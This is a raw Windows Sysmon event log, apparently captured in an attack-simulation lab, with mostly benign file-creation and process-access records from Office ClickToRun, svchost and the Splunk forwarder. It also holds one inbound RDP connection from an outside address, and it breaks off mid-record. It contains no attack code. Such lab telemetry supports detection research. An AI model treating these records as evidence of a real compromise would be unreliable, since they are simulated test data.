Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AD308801971211A6360D9ED31C7DC51E,SHA256=AA2F9203167BE2DBE507504DA15CB5B9695DC613D6B8523C27D05769C2FF7291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.441{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D290AD9C48CA3EEDCDF7E406FF982D3,SHA256=A49A07E67C90C3891C92039FF00B4365B89C878C1F38A8EA8594FDF772E96011,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.316{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Windows\Temp\OfficeC2R9610A3B1-5B9E-4F5F-8A42-807B374CCE71\s640.cabMD5=2127962B3293F576E42E241C1594EB4B,SHA256=5EA7B9ACE8C460882A7C73383D1CD622DB993C73A30BDAA8EDC367C9582336C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.175{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\OfficeC2R9610A3B1-5B9E-4F5F-8A42-807B374CCE71\BIT63B9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.128{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\OfficeC2R9610A3B1-5B9E-4F5F-8A42-807B374CCE71\BIT63B9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.128{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 23542300x800000000000000063359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Windows\Temp\s640CheckReachable10570190-4E41-4486-B46F-FB6E59FF04DAMD5=69691C7BDCC3CE6D5D8A1361F22D04AC,SHA256=08F271887CE94707DA822D5263BAE19D5519CB3614E0DAEDC4C7CE5DAB7473F1,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x4d 23542300x800000000000000063358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.128{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\BIT6389.tmpMD5=93B885ADFE0DA089CDF634904FD59F71,SHA256=6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000063357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.128{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\BIT6389.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.081{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\BIT6389.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.081{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 354300x800000000000000063354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:38.554{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52776-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.982{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57490- 354300x800000000000000063352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.982{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local65535- 23542300x800000000000000063351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Windows\Temp\OfficeC2R49DF76BF-A14D-44CB-9027-1A8929C06524\s641033.cabMD5=F83B3489A29357C7E3AD9C38AC2BB91A,SHA256=6B1299B8882A47C613C56557B923A75F6D57598EFC685B280AE9C16729BFD4AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.003{A7A01FEF-B626-607E-1400-00000000BB01}12762020C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000049293Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:41.854{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA2E4B8B6DD4BDCA5CA2CC7558320EE0,SHA256=F1634C8F59B5EF5EC8D790A00446025DDE88E201F16A055E65AF028F34E9D1C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.988{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C4318FF8B5B8459D3F2CEDB7F1F1412,SHA256=77F5E021886318577787828BA77E7DB16F855A4C97259A4FD57B36E001FCD44C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.988{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=255252172703282DBFF11B5DBB25A9E7,SHA256=23BBAC55EF79FCA6862953E3D7567BBB19601BF612774C7944F9C118A5CA8D39,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.800{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.800{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.800{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.800{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.800{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.800{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.800{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.769{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.769{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.769{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.753{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.753{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.738{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.738{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.738{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.738{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.597{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.566{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.566{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft 